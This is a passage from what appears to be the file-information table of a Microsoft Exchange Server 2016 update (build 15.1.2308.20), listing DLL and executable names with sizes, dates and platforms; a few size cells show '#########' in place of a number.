3-Nov-21| 18:22| x64 \nMicrosoft.exchange.configuration.delegatedauth.dll| 15.1.2308.20| 53,112| 3-Nov-21| 19:59| x86 \nMicrosoft.exchange.configuration.delegatedauth.eventlog.dll| 15.1.2308.20| 15,760| 3-Nov-21| 18:37| x64 \nMicrosoft.exchange.configuration.diagnosticsmodules.dll| 15.1.2308.20| 23,416| 3-Nov-21| 19:56| x86 \nMicrosoft.exchange.configuration.diagnosticsmodules.eventlog.dll| 15.1.2308.20| 13,200| 3-Nov-21| 18:28| x64 \nMicrosoft.exchange.configuration.failfast.dll| 15.1.2308.20| 54,648| 3-Nov-21| 19:59| x86 \nMicrosoft.exchange.configuration.failfast.eventlog.dll| 15.1.2308.20| 13,688| 3-Nov-21| 18:37| x64 \nMicrosoft.exchange.configuration.objectmodel.dll| 15.1.2308.20| 1,846,648| 3-Nov-21| 20:04| x86 \nMicrosoft.exchange.configuration.objectmodel.eventlog.dll| 15.1.2308.20| 30,072| 3-Nov-21| 18:22| x64 \nMicrosoft.exchange.configuration.redirectionmodule.dll| 15.1.2308.20| 68,472| 3-Nov-21| 19:56| x86 \nMicrosoft.exchange.configuration.redirectionmodule.eventlog.dll| 15.1.2308.20| 15,232| 3-Nov-21| 18:20| x64 \nMicrosoft.exchange.configuration.remotepowershellbackendcmdletproxymodule.dll| 15.1.2308.20| 21,392| 3-Nov-21| 19:53| x86 \nMicrosoft.exchange.configuration.remotepowershellbackendcmdletproxymodule.eventlog.dll| 15.1.2308.20| 13,176| 3-Nov-21| 18:22| x64 \nMicrosoft.exchange.connectiondatacollector.dll| 15.1.2308.20| 26,000| 3-Nov-21| 18:37| x86 \nMicrosoft.exchange.connections.common.dll| 15.1.2308.20| 169,872| 3-Nov-21| 18:58| x86 \nMicrosoft.exchange.connections.eas.dll| 15.1.2308.20| 330,128| 3-Nov-21| 19:00| x86 \nMicrosoft.exchange.connections.imap.dll| 15.1.2308.20| 173,944| 3-Nov-21| 19:00| x86 \nMicrosoft.exchange.connections.pop.dll| 15.1.2308.20| 71,056| 3-Nov-21| 19:00| x86 \nMicrosoft.exchange.contentfilter.wrapper.exe| 15.1.2308.20| 203,664| 3-Nov-21| 18:29| x64 \nMicrosoft.exchange.context.client.dll| 15.1.2308.20| 27,016| 3-Nov-21| 19:51| x86 \nMicrosoft.exchange.context.configuration.dll| 15.1.2308.20| 51,600| 3-Nov-21| 18:52| x86 \nMicrosoft.exchange.context.core.dll| 15.1.2308.20| 51,064| 3-Nov-21| 19:25| x86 \nMicrosoft.exchange.context.datamodel.dll| 15.1.2308.20| 46,984| 3-Nov-21| 19:14| x86 \nMicrosoft.exchange.core.strings.dll| 15.1.2308.20| 1,092,472| 3-Nov-21| 18:41| x86 \nMicrosoft.exchange.core.timezone.dll| 15.1.2308.20| 57,232| 3-Nov-21| 18:30| x86 \nMicrosoft.exchange.data.applicationlogic.deep.dll| 15.1.2308.20| 326,520| 3-Nov-21| 18:20| x86 \nMicrosoft.exchange.data.applicationlogic.dll| 15.1.2308.20| 3,358,088| 3-Nov-21| 19:45| x86 \nMicrosoft.exchange.data.applicationlogic.eventlog.dll| 15.1.2308.20| 35,720| 3-Nov-21| 18:37| x64 \nMicrosoft.exchange.data.applicationlogic.monitoring.ifx.dll| 15.1.2308.20| 17,808| 3-Nov-21| 19:47| x86 \nMicrosoft.exchange.data.connectors.dll| 15.1.2308.20| 165,264| 3-Nov-21| 19:35| x86 \nMicrosoft.exchange.data.consumermailboxprovisioning.dll| 15.1.2308.20| 619,400| 3-Nov-21| 19:37| x86 \nMicrosoft.exchange.data.directory.dll| 15.1.2308.20| 7,786,376| 3-Nov-21| 19:19| x86 \nMicrosoft.exchange.data.directory.eventlog.dll| 15.1.2308.20| 80,272| 3-Nov-21| 18:30| x64 \nMicrosoft.exchange.data.dll| 15.1.2308.20| 1,963,384| 3-Nov-21| 19:14| x86 \nMicrosoft.exchange.data.groupmailboxaccesslayer.dll| 15.1.2308.20| 1,626,512| 3-Nov-21| 20:07| x86 \nMicrosoft.exchange.data.ha.dll| 15.1.2308.20| 364,424| 3-Nov-21| 19:25| x86 \nMicrosoft.exchange.data.imageanalysis.dll| 15.1.2308.20| 105,336| 3-Nov-21| 18:52| x86 \nMicrosoft.exchange.data.mailboxfeatures.dll| 15.1.2308.20| 15,752| 3-Nov-21| 19:37| x86 \nMicrosoft.exchange.data.mailboxloadbalance.dll| 15.1.2308.20| 224,632| 3-Nov-21| 19:35| x86 \nMicrosoft.exchange.data.mapi.dll| 15.1.2308.20| 186,768| 3-Nov-21| 19:35| x86 \nMicrosoft.exchange.data.metering.contracts.dll| 15.1.2308.20| 39,824| 3-Nov-21| 18:36| x86 \nMicrosoft.exchange.data.metering.dll| 15.1.2308.20| 119,160| 3-Nov-21| 18:52| x86 \nMicrosoft.exchange.data.msosyncxsd.dll| 15.1.2308.20| 968,056| 3-Nov-21| 18:36| x86 \nMicrosoft.exchange.data.notification.dll| 15.1.2308.20| 141,192| 3-Nov-21| 19:35| x86 \nMicrosoft.exchange.data.personaldataplatform.dll| 15.1.2308.20| 769,424| 3-Nov-21| 18:56| x86 \nMicrosoft.exchange.data.providers.dll| 15.1.2308.20| 139,640| 3-Nov-21| 19:32| x86 \nMicrosoft.exchange.data.provisioning.dll| 15.1.2308.20| 56,712| 3-Nov-21| 19:25| x86 \nMicrosoft.exchange.data.rightsmanagement.dll| 15.1.2308.20| 453,000| 3-Nov-21| 19:25| x86 \nMicrosoft.exchange.data.scheduledtimers.dll| 15.1.2308.20| 32,632| 3-Nov-21| 19:33| x86 \nMicrosoft.exchange.data.storage.clientstrings.dll| 15.1.2308.20| 256,392| 3-Nov-21| 18:37| x86 \nMicrosoft.exchange.data.storage.dll| 15.1.2308.20| #########| 3-Nov-21| 19:30| x86 \nMicrosoft.exchange.data.storage.eventlog.dll| 15.1.2308.20| 37,768| 3-Nov-21| 18:37| x64 \nMicrosoft.exchange.data.storageconfigurationresources.dll| 15.1.2308.20| 655,736| 3-Nov-21| 18:37| x86 \nMicrosoft.exchange.data.storeobjects.dll| 15.1.2308.20| 174,472| 3-Nov-21| 19:25| x86 \nMicrosoft.exchange.data.throttlingservice.client.dll| 15.1.2308.20| 36,216| 3-Nov-21| 19:25| x86 \nMicrosoft.exchange.data.throttlingservice.client.eventlog.dll| 15.1.2308.20| 14,224| 3-Nov-21| 18:30| x64 \nMicrosoft.exchange.data.throttlingservice.eventlog.dll| 15.1.2308.20| 14,216| 3-Nov-21| 18:37| x64 \nMicrosoft.exchange.datacenter.management.activemonitoring.recoveryservice.eventlog.dll| 15.1.2308.20| 14,712| 3-Nov-21| 18:22| x64 \nMicrosoft.exchange.datacenterstrings.dll| 15.1.2308.20| 72,568| 3-Nov-21| 20:50| x86 \nMicrosoft.exchange.delivery.eventlog.dll| 15.1.2308.20| 13,184| 3-Nov-21| 18:37| x64 \nMicrosoft.exchange.diagnostics.certificatelogger.dll| 15.1.2308.20| 22,904| 3-Nov-21| 19:25| x86 \nMicrosoft.exchange.diagnostics.dll| 15.1.2308.20| 1,813,384| 3-Nov-21| 18:36| x86 \nMicrosoft.exchange.diagnostics.dll.deploy| 15.1.2308.20| 1,813,384| 3-Nov-21| 18:36| Not applicable \nMicrosoft.exchange.diagnostics.performancelogger.dll| 15.1.2308.20| 23,944| 3-Nov-21| 18:54| x86 \nMicrosoft.exchange.diagnostics.service.common.dll| 15.1.2308.20| 546,704| 3-Nov-21| 18:52| x86 \nMicrosoft.exchange.diagnostics.service.eventlog.dll| 15.1.2308.20| 215,432| 3-Nov-21| 18:30| x64 \nMicrosoft.exchange.diagnostics.service.exchangejobs.dll| 15.1.2308.20| 193,392| 3-Nov-21| 19:51| x86 \nMicrosoft.exchange.diagnostics.service.exe| 15.1.2308.20| 146,312| 3-Nov-21| 19:25| x86 \nMicrosoft.exchange.diagnostics.service.fuseboxperfcounters.dll| 15.1.2308.20| 27,528| 3-Nov-21| 18:54| x86 \nMicrosoft.exchange.diagnosticsaggregation.eventlog.dll| 15.1.2308.20| 13,704| 3-Nov-21| 18:38| x64 \nMicrosoft.exchange.diagnosticsaggregationservicelet.dll| 15.1.2308.20| 49,544| 3-Nov-21| 20:11| x86 \nMicrosoft.exchange.directory.topologyservice.eventlog.dll| 15.1.2308.20| 28,048| 3-Nov-21| 18:22| x64 \nMicrosoft.exchange.directory.topologyservice.exe| 15.1.2308.20| 208,784| 3-Nov-21| 19:46| x86 \nMicrosoft.exchange.disklocker.events.dll| 15.1.2308.20| 88,976| 3-Nov-21| 18:22| x64 \nMicrosoft.exchange.disklocker.interop.dll| 15.1.2308.20| 32,632| 3-Nov-21| 18:37| x86 \nMicrosoft.exchange.drumtesting.calendarmigration.dll| 15.1.2308.20| 45,944| 3-Nov-21| 20:24| x86 \nMicrosoft.exchange.drumtesting.common.dll| 15.1.2308.20| 18,824| 3-Nov-21| 20:22| x86 \nMicrosoft.exchange.dxstore.dll| 15.1.2308.20| 468,856| 3-Nov-21| 18:54| x86 \nMicrosoft.exchange.dxstore.ha.events.dll| 15.1.2308.20| 206,200| 3-Nov-21| 18:20| x64 \nMicrosoft.exchange.dxstore.ha.instance.exe| 15.1.2308.20| 36,728| 3-Nov-21| 20:16| x86 \nMicrosoft.exchange.eac.flighting.dll| 15.1.2308.20| 131,448| 3-Nov-21| 18:52| x86 \nMicrosoft.exchange.edgecredentialsvc.exe| 15.1.2308.20| 21,880| 3-Nov-21| 19:25| x86 \nMicrosoft.exchange.edgesync.common.dll| 15.1.2308.20| 148,344| 3-Nov-21| 19:28| x86 \nMicrosoft.exchange.edgesync.datacenterproviders.dll| 15.1.2308.20| 220,040| 3-Nov-21| 19:30| x86 \nMicrosoft.exchange.edgesync.eventlog.dll| 15.1.2308.20| 23,928| 3-Nov-21| 18:37| x64 \nMicrosoft.exchange.edgesyncsvc.exe| 15.1.2308.20| 97,672| 3-Nov-21| 19:29| x86 \nMicrosoft.exchange.ediscovery.export.dll| 15.1.2308.20| 1,266,576| 3-Nov-21| 18:37| x86 \nMicrosoft.exchange.ediscovery.export.dll.deploy| 15.1.2308.20| 1,266,576| 3-Nov-21| 18:37| Not applicable \nMicrosoft.exchange.ediscovery.exporttool.application| Not applicable| 16,522| 3-Nov-21| 18:41| Not applicable \nMicrosoft.exchange.ediscovery.exporttool.exe.deploy| 15.1.2308.20| 87,416| 3-Nov-21| 18:37| Not applicable \nMicrosoft.exchange.ediscovery.exporttool.manifest| Not applicable| 67,459| 3-Nov-21| 18:41| Not applicable \nMicrosoft.exchange.ediscovery.exporttool.strings.dll.deploy| 15.1.2308.20| 52,104| 3-Nov-21| 18:30| Not applicable \nMicrosoft.exchange.ediscovery.mailboxsearch.dll| 15.1.2308.20| 294,264| 3-Nov-21| 20:14| x86 \nMicrosoft.exchange.entities.birthdaycalendar.dll| 15.1.2308.20| 73,088| 3-Nov-21| 20:23| x86 \nMicrosoft.exchange.entities.booking.defaultservicesettings.dll| 15.1.2308.20| 45,968| 3-Nov-21| 19:35| x86 \nMicrosoft.exchange.entities.booking.dll| 15.1.2308.20| 218,488| 3-Nov-21| 20:25| x86 \nMicrosoft.exchange.entities.booking.management.dll| 15.1.2308.20| 78,224| 3-Nov-21| 19:42| x86 \nMicrosoft.exchange.entities.bookings.dll| 15.1.2308.20| 35,728| 3-Nov-21| 19:43| x86 \nMicrosoft.exchange.entities.calendaring.dll| 15.1.2308.20| 932,216| 3-Nov-21| 20:18| x86 \nMicrosoft.exchange.entities.common.dll| 15.1.2308.20| 336,264| 3-Nov-21| 19:41| x86 \nMicrosoft.exchange.entities.connectors.dll| 15.1.2308.20| 52,624| 3-Nov-21| 19:42| x86 \nMicrosoft.exchange.entities.contentsubmissions.dll| 15.1.2308.20| 32,144| 3-Nov-21| 19:51| x86 \nMicrosoft.exchange.entities.context.dll| 15.1.2308.20| 60,816| 3-Nov-21| 19:47| x86 \nMicrosoft.exchange.entities.datamodel.dll| 15.1.2308.20| 854,416| 3-Nov-21| 19:35| x86 \nMicrosoft.exchange.entities.fileproviders.dll| 15.1.2308.20| 291,720| 3-Nov-21| 20:23| x86 \nMicrosoft.exchange.entities.foldersharing.dll| 15.1.2308.20| 39,288| 3-Nov-21| 19:53| x86 \nMicrosoft.exchange.entities.holidaycalendars.dll| 15.1.2308.20| 76,168| 3-Nov-21| 20:23| x86 \nMicrosoft.exchange.entities.insights.dll| 15.1.2308.20| 166,776| 3-Nov-21| 20:29| x86 \nMicrosoft.exchange.entities.meetinglocation.dll| 15.1.2308.20| 1,486,712| 3-Nov-21| 20:31| x86 \nMicrosoft.exchange.entities.meetingparticipants.dll| 15.1.2308.20| 122,232| 3-Nov-21| 20:23| x86 \nMicrosoft.exchange.entities.meetingtimecandidates.dll| 15.1.2308.20| #########| 3-Nov-21| 20:35| x86 \nMicrosoft.exchange.entities.onlinemeetings.dll| 15.1.2308.20| 264,056| 3-Nov-21| 19:53| x86 \nMicrosoft.exchange.entities.people.dll| 15.1.2308.20| 37,776| 3-Nov-21| 19:46| x86 \nMicrosoft.exchange.entities.peopleinsights.dll| 15.1.2308.20| 186,760| 3-Nov-21| 20:23| x86 \nMicrosoft.exchange.entities.reminders.dll| 15.1.2308.20| 64,376| 3-Nov-21| 20:28| x86 \nMicrosoft.exchange.entities.schedules.dll| 15.1.2308.20| 83,848| 3-Nov-21| 20:29| x86 \nMicrosoft.exchange.entities.shellservice.dll| 15.1.2308.20| 63,864| 3-Nov-21| 19:32| x86 \nMicrosoft.exchange.entities.tasks.dll| 15.1.2308.20| 100,216| 3-Nov-21| 19:56| x86 \nMicrosoft.exchange.entities.xrm.dll| 15.1.2308.20| 144,760| 3-Nov-21| 19:43| x86 \nMicrosoft.exchange.entityextraction.calendar.dll| 15.1.2308.20| 270,200| 3-Nov-21| 20:23| x86 \nMicrosoft.exchange.eserepl.common.dll| 15.1.2308.20| 15,224| 3-Nov-21| 18:20| x86 \nMicrosoft.exchange.eserepl.configuration.dll| 15.1.2308.20| 15,760| 3-Nov-21| 18:52| x86 \nMicrosoft.exchange.eserepl.dll| 15.1.2308.20| 131,976| 3-Nov-21| 19:15| x86 \nMicrosoft.exchange.ews.configuration.dll| 15.1.2308.20| 254,344| 3-Nov-21| 19:32| x86 \nMicrosoft.exchange.exchangecertificate.eventlog.dll| 15.1.2308.20| 13,176| 3-Nov-21| 18:37| x64 \nMicrosoft.exchange.exchangecertificateservicelet.dll| 15.1.2308.20| 37,256| 3-Nov-21| 20:48| x86 \nMicrosoft.exchange.extensibility.internal.dll| 15.1.2308.20| 640,888| 3-Nov-21| 19:14| x86 \nMicrosoft.exchange.extensibility.partner.dll| 15.1.2308.20| 37,240| 3-Nov-21| 19:41| x86 \nMicrosoft.exchange.federateddirectory.dll| 15.1.2308.20| 146,296| 3-Nov-21| 21:05| x86 \nMicrosoft.exchange.ffosynclogmsg.dll| 15.1.2308.20| 13,176| 3-Nov-21| 18:20| x64 \nMicrosoft.exchange.frontendhttpproxy.dll| 15.1.2308.20| 594,816| 3-Nov-21| 20:58| x86 \nMicrosoft.exchange.frontendhttpproxy.eventlogs.dll| 15.1.2308.20| 14,712| 3-Nov-21| 18:20| x64 \nMicrosoft.exchange.frontendtransport.monitoring.dll| 15.1.2308.20| 30,096| 3-Nov-21| 21:49| x86 \nMicrosoft.exchange.griffin.variantconfiguration.dll| 15.1.2308.20| 99,728| 3-Nov-21| 18:52| x86 \nMicrosoft.exchange.hathirdpartyreplication.dll| 15.1.2308.20| 42,360| 3-Nov-21| 19:15| x86 \nMicrosoft.exchange.helpprovider.dll| 15.1.2308.20| 40,312| 3-Nov-21| 20:07| x86 \nMicrosoft.exchange.httpproxy.addressfinder.dll| 15.1.2308.20| 54,136| 3-Nov-21| 20:14| x86 \nMicrosoft.exchange.httpproxy.common.dll| 15.1.2308.20| 163,704| 3-Nov-21| 19:51| x86 \nMicrosoft.exchange.httpproxy.diagnostics.dll| 15.1.2308.20| 58,744| 3-Nov-21| 20:12| x86 \nMicrosoft.exchange.httpproxy.flighting.dll| 15.1.2308.20| 204,680| 3-Nov-21| 18:52| x86 \nMicrosoft.exchange.httpproxy.passivemonitor.dll| 15.1.2308.20| 17,800| 3-Nov-21| 19:14| x86 \nMicrosoft.exchange.httpproxy.proxyassistant.dll| 15.1.2308.20| 30,600| 3-Nov-21| 20:14| x86 \nMicrosoft.exchange.httpproxy.routerefresher.dll| 15.1.2308.20| 38,776| 3-Nov-21| 20:16| x86 \nMicrosoft.exchange.httpproxy.routeselector.dll| 15.1.2308.20| 48,520| 3-Nov-21| 20:14| x86 \nMicrosoft.exchange.httpproxy.routing.dll| 15.1.2308.20| 180,624| 3-Nov-21| 19:52| x86 \nMicrosoft.exchange.httpredirectmodules.dll| 15.1.2308.20| 36,752| 3-Nov-21| 20:58| x86 \nMicrosoft.exchange.httprequestfiltering.dll| 15.1.2308.20| 28,040| 3-Nov-21| 18:54| x86 \nMicrosoft.exchange.httputilities.dll| 15.1.2308.20| 25,992| 3-Nov-21| 20:13| x86 \nMicrosoft.exchange.hygiene.data.dll| 15.1.2308.20| 1,868,176| 3-Nov-21| 20:11| x86 \nMicrosoft.exchange.hygiene.diagnosisutil.dll| 15.1.2308.20| 54,648| 3-Nov-21| 18:20| x86 \nMicrosoft.exchange.hygiene.eopinstantprovisioning.dll| 15.1.2308.20| 35,728| 3-Nov-21| 20:51| x86 \nMicrosoft.exchange.idserialization.dll| 15.1.2308.20| 35,704| 3-Nov-21| 18:20| x86 \nMicrosoft.exchange.imap4.eventlog.dll| 15.1.2308.20| 18,296| 3-Nov-21| 18:37| x64 \nMicrosoft.exchange.imap4.eventlog.dll.fe| 15.1.2308.20| 18,296| 3-Nov-21| 18:37| Not applicable \nMicrosoft.exchange.imap4.exe| 15.1.2308.20| 263,032| 3-Nov-21| 19:56| x86 \nMicrosoft.exchange.imap4.exe.fe| 15.1.2308.20| 263,032| 3-Nov-21| 19:56| Not applicable \nMicrosoft.exchange.imap4service.exe| 15.1.2308.20| 24,952| 3-Nov-21| 19:52| x86 \nMicrosoft.exchange.imap4service.exe.fe| 15.1.2308.20| 24,952| 3-Nov-21| 19:52| Not applicable \nMicrosoft.exchange.imapconfiguration.dl1| 15.1.2308.20| 53,136| 3-Nov-21| 18:52| Not applicable \nMicrosoft.exchange.inference.common.dll| 15.1.2308.20| 216,952| 3-Nov-21| 19:33| x86 \nMicrosoft.exchange.inference.hashtagsrelevance.dll| 15.1.2308.20| 32,120| 3-Nov-21| 20:31| x64 \nMicrosoft.exchange.inference.peoplerelevance.dll| 15.1.2308.20| 281,992| 3-Nov-21| 20:29| x86 \nMicrosoft.exchange.inference.ranking.dll| 15.1.2308.20| 18,824| 3-Nov-21| 19:32| x86 \nMicrosoft.exchange.inference.safetylibrary.dll| 15.1.2308.20| 83,840| 3-Nov-21| 20:23| x86 \nMicrosoft.exchange.inference.service.eventlog.dll| 15.1.2308.20| 15,224| 3-Nov-21| 18:28| x64 \nMicrosoft.exchange.infoworker.assistantsclientresources.dll| 15.1.2308.20| 94,096| 3-Nov-21| 18:36| x86 \nMicrosoft.exchange.infoworker.common.dll| 15.1.2308.20| 1,842,040| 3-Nov-21| 20:12| x86 \nMicrosoft.exchange.infoworker.eventlog.dll| 15.1.2308.20| 71,544| 3-Nov-21| 18:28| x64 \nMicrosoft.exchange.infoworker.meetingvalidator.dll| 15.1.2308.20| 175,504| 3-Nov-21| 20:14| x86 \nMicrosoft.exchange.instantmessaging.dll| 15.1.2308.20| 45,944| 3-Nov-21| 18:20| x86 \nMicrosoft.exchange.irm.formprotector.dll| 15.1.2308.20| 159,608| 3-Nov-21| 18:39| x64 \nMicrosoft.exchange.irm.msoprotector.dll| 15.1.2308.20| 51,072| 3-Nov-21| 18:37| x64 \nMicrosoft.exchange.irm.ofcprotector.dll| 15.1.2308.20| 45,944| 3-Nov-21| 18:36| x64 \nMicrosoft.exchange.isam.databasemanager.dll| 15.1.2308.20| 30,600| 3-Nov-21| 18:52| x86 \nMicrosoft.exchange.isam.esebcli.dll| 15.1.2308.20| 100,240| 3-Nov-21| 18:30| x64 \nMicrosoft.exchange.jobqueue.eventlog.dll| 15.1.2308.20| 13,176| 3-Nov-21| 18:37| x64 \nMicrosoft.exchange.jobqueueservicelet.dll| 15.1.2308.20| 271,224| 3-Nov-21| 21:06| x86 \nMicrosoft.exchange.killswitch.dll| 15.1.2308.20| 22,416| 3-Nov-21| 18:20| x86 \nMicrosoft.exchange.killswitchconfiguration.dll| 15.1.2308.20| 33,680| 3-Nov-21| 18:52| x86 \nMicrosoft.exchange.loganalyzer.analyzers.auditing.dll| 15.1.2308.20| 18,312| 3-Nov-21| 18:30| x86 \nMicrosoft.exchange.loganalyzer.analyzers.certificatelog.dll| 15.1.2308.20| 15,248| 3-Nov-21| 18:28| x86 \nMicrosoft.exchange.loganalyzer.analyzers.cmdletinfralog.dll| 15.1.2308.20| 27,528| 3-Nov-21| 18:37| x86 \nMicrosoft.exchange.loganalyzer.analyzers.easlog.dll| 15.1.2308.20| 30,608| 3-Nov-21| 19:25| x86 \nMicrosoft.exchange.loganalyzer.analyzers.ecplog.dll| 15.1.2308.20| 22,408| 3-Nov-21| 18:36| x86 \nMicrosoft.exchange.loganalyzer.analyzers.eventlog.dll| 15.1.2308.20| 66,440| 3-Nov-21| 19:25| x86 \nMicrosoft.exchange.loganalyzer.analyzers.ewslog.dll| 15.1.2308.20| 29,584| 3-Nov-21| 18:37| x86 \nMicrosoft.exchange.loganalyzer.analyzers.griffinperfcounter.dll| 15.1.2308.20| 19,856| 3-Nov-21| 19:25| x86 \nMicrosoft.exchange.loganalyzer.analyzers.groupescalationlog.dll| 15.1.2308.20| 20,368| 3-Nov-21| 18:30| x86 \nMicrosoft.exchange.loganalyzer.analyzers.httpproxylog.dll| 15.1.2308.20| 19,344| 3-Nov-21| 19:25| x86 \nMicrosoft.exchange.loganalyzer.analyzers.hxservicelog.dll| 15.1.2308.20| 34,192| 3-Nov-21| 19:25| x86 \nMicrosoft.exchange.loganalyzer.analyzers.iislog.dll| 15.1.2308.20| 103,800| 3-Nov-21| 18:29| x86 \nMicrosoft.exchange.loganalyzer.analyzers.lameventlog.dll| 15.1.2308.20| 31,624| 3-Nov-21| 19:25| x86 \nMicrosoft.exchange.loganalyzer.analyzers.migrationlog.dll| 15.1.2308.20| 15,760| 3-Nov-21| 18:30| x86 \nMicrosoft.exchange.loganalyzer.analyzers.oabdownloadlog.dll| 15.1.2308.20| 20,880| 3-Nov-21| 19:25| x86 \nMicrosoft.exchange.loganalyzer.analyzers.oauthcafelog.dll| 15.1.2308.20| 16,248| 3-Nov-21| 18:38| x86 \nMicrosoft.exchange.loganalyzer.analyzers.outlookservicelog.dll| 15.1.2308.20| 49,040| 3-Nov-21| 19:25| x86 \nMicrosoft.exchange.loganalyzer.analyzers.owaclientlog.dll| 15.1.2308.20| 44,416| 3-Nov-21| 19:25| x86 \nMicrosoft.exchange.loganalyzer.analyzers.owalog.dll| 15.1.2308.20| 38,288| 3-Nov-21| 18:36| x86 \nMicrosoft.exchange.loganalyzer.analyzers.perflog.dll| 15.1.2308.20| #########| 3-Nov-21| 19:25| x86 \nMicrosoft.exchange.loganalyzer.analyzers.pfassistantlog.dll| 15.1.2308.20| 29,064| 3-Nov-21| 18:30| x86 \nMicrosoft.exchange.loganalyzer.analyzers.rca.dll| 15.1.2308.20| 21,384| 3-Nov-21| 18:30| x86 \nMicrosoft.exchange.loganalyzer.analyzers.restlog.dll| 15.1.2308.20| 24,464| 3-Nov-21| 19:25| x86 \nMicrosoft.exchange.loganalyzer.analyzers.store.dll| 15.1.2308.20| 15,240| 3-Nov-21| 19:25| x86 \nMicrosoft.exchange.loganalyzer.analyzers.transportsynchealthlog.dll| 15.1.2308.20| 21,904| 3-Nov-21| 18:29| x86 \nMicrosoft.exchange.loganalyzer.core.dll| 15.1.2308.20| 89,464| 3-Nov-21| 18:22| x86 \nMicrosoft.exchange.loganalyzer.extensions.auditing.dll| 15.1.2308.20| 20,856| 3-Nov-21| 18:28| x86 \nMicrosoft.exchange.loganalyzer.extensions.certificatelog.dll| 15.1.2308.20| 26,488| 3-Nov-21| 18:28| x86 \nMicrosoft.exchange.loganalyzer.extensions.cmdletinfralog.dll| 15.1.2308.20| 21,368| 3-Nov-21| 18:28| x86 \nMicrosoft.exchange.loganalyzer.extensions.common.dll| 15.1.2308.20| 28,048| 3-Nov-21| 18:23| x86 \nMicrosoft.exchange.loganalyzer.extensions.easlog.dll| 15.1.2308.20| 28,552| 3-Nov-21| 18:29| x86 \nMicrosoft.exchange.loganalyzer.extensions.errordetection.dll| 15.1.2308.20| 36,240| 3-Nov-21| 18:28| x86 \nMicrosoft.exchange.loganalyzer.extensions.ewslog.dll| 15.1.2308.20| 16,784| 3-Nov-21| 18:28| x86 \nMicrosoft.exchange.loganalyzer.extensions.griffinperfcounter.dll| 15.1.2308.20| 19,832| 3-Nov-21| 18:28| x86 \nMicrosoft.exchange.loganalyzer.extensions.groupescalationlog.dll| 15.1.2308.20| 15,248| 3-Nov-21| 18:28| x86 \nMicrosoft.exchange.loganalyzer.extensions.httpproxylog.dll| 15.1.2308.20| 17,296| 3-Nov-21| 18:28| x86 \nMicrosoft.exchange.loganalyzer.extensions.hxservicelog.dll| 15.1.2308.20| 19,832| 3-Nov-21| 18:28| x86 \nMicrosoft.exchange.loganalyzer.extensions.iislog.dll| 15.1.2308.20| 57,232| 3-Nov-21| 18:28| x86 \nMicrosoft.exchange.loganalyzer.extensions.migrationlog.dll| 15.1.2308.20| 17,784| 3-Nov-21| 18:28| x86 \nMicrosoft.exchange.loganalyzer.extensions.oabdownloadlog.dll| 15.1.2308.20| 18,808| 3-Nov-21| 19:25| x86 \nMicrosoft.exchange.loganalyzer.extensions.oauthcafelog.dll| 15.1.2308.20| 16,272| 3-Nov-21| 18:28| x86 \nMicrosoft.exchange.loganalyzer.extensions.outlookservicelog.dll| 15.1.2308.20| 17,808| 3-Nov-21| 18:29| x86 \nMicrosoft.exchange.loganalyzer.extensions.owaclientlog.dll| 15.1.2308.20| 15,224| 3-Nov-21| 18:28| x86 \nMicrosoft.exchange.loganalyzer.extensions.owalog.dll| 15.1.2308.20| 15,224| 3-Nov-21| 18:28| x86 \nMicrosoft.exchange.loganalyzer.extensions.perflog.dll| 15.1.2308.20| 52,624| 3-Nov-21| 18:23| x86 \nMicrosoft.exchange.loganalyzer.extensions.pfassistantlog.dll| 15.1.2308.20| 18,296| 3-Nov-21| 18:28| x86 \nMicrosoft.exchange.loganalyzer.extensions.rca.dll| 15.1.2308.20| 34,192| 3-Nov-21| 18:28| x86 \nMicrosoft.exchange.loganalyzer.extensions.restlog.dll| 15.1.2308.20| 17,288| 3-Nov-21| 19:25| x86 \nMicrosoft.exchange.loganalyzer.extensions.store.dll| 15.1.2308.20| 18,808| 3-Nov-21| 18:28| x86 \nMicrosoft.exchange.loganalyzer.extensions.transportsynchealthlog.dll| 15.1.2308.20| 43,384| 3-Nov-21| 18:28| x86 \nMicrosoft.exchange.loguploader.dll| 15.1.2308.20| 165,256| 3-Nov-21| 18:58| x86 \nMicrosoft.exchange.loguploaderproxy.dll| 15.1.2308.20| 54,664| 3-Nov-21| 18:56| x86 \nMicrosoft.exchange.mailboxassistants.assistants.dll| 15.1.2308.20| 9,063,288| 3-Nov-21| 21:38| x86 \nMicrosoft.exchange.mailboxassistants.attachmentthumbnail.dll| 15.1.2308.20| 33,168| 3-Nov-21| 19:56| x86 \nMicrosoft.exchange.mailboxassistants.common.dll| 15.1.2308.20| 124,296| 3-Nov-21| 20:16| x86 \nMicrosoft.exchange.mailboxassistants.crimsonevents.dll| 15.1.2308.20| 82,808| 3-Nov-21| 18:22| x64 \nMicrosoft.exchange.mailboxassistants.eventlog.dll| 15.1.2308.20| 14,200| 3-Nov-21| 18:39| x64 \nMicrosoft.exchange.mailboxassistants.rightsmanagement.dll| 15.1.2308.20| 30,096| 3-Nov-21| 20:20| x86 \nMicrosoft.exchange.mailboxloadbalance.dll| 15.1.2308.20| 661,392| 3-Nov-21| 20:31| x86 \nMicrosoft.exchange.mailboxloadbalance.serverstrings.dll| 15.1.2308.20| 63,376| 3-Nov-21| 20:10| x86 \nMicrosoft.exchange.mailboxreplicationservice.calendarsyncprovider.dll| 15.1.2308.20| 175,496| 3-Nov-21| 20:23| x86 \nMicrosoft.exchange.mailboxreplicationservice.common.dll| 15.1.2308.20| 2,786,192| 3-Nov-21| 20:18| x86 \nMicrosoft.exchange.mailboxreplicationservice.complianceprovider.dll| 15.1.2308.20| 53,128| 3-Nov-21| 20:21| x86 \nMicrosoft.exchange.mailboxreplicationservice.contactsyncprovider.dll| 15.1.2308.20| 151,952| 3-Nov-21| 20:22| x86 \nMicrosoft.exchange.mailboxreplicationservice.dll| 15.1.2308.20| 966,544| 3-Nov-21| 20:29| x86 \nMicrosoft.exchange.mailboxreplicationservice.easprovider.dll| 15.1.2308.20| 185,224| 3-Nov-21| 20:22| x86 \nMicrosoft.exchange.mailboxreplicationservice.eventlog.dll| 15.1.2308.20| 31,632| 3-Nov-21| 18:20| x64 \nMicrosoft.exchange.mailboxreplicationservice.googledocprovider.dll| 15.1.2308.20| 39,816| 3-Nov-21| 20:23| x86 \nMicrosoft.exchange.mailboxreplicationservice.imapprovider.dll| 15.1.2308.20| 105,856| 3-Nov-21| 20:23| x86 \nMicrosoft.exchange.mailboxreplicationservice.mapiprovider.dll| 15.1.2308.20| 94,608| 3-Nov-21| 20:21| x86 \nMicrosoft.exchange.mailboxreplicationservice.popprovider.dll| 15.1.2308.20| 43,408| 3-Nov-21| 20:23| x86 \nMicrosoft.exchange.mailboxreplicationservice.proxyclient.dll| 15.1.2308.20| 18,808| 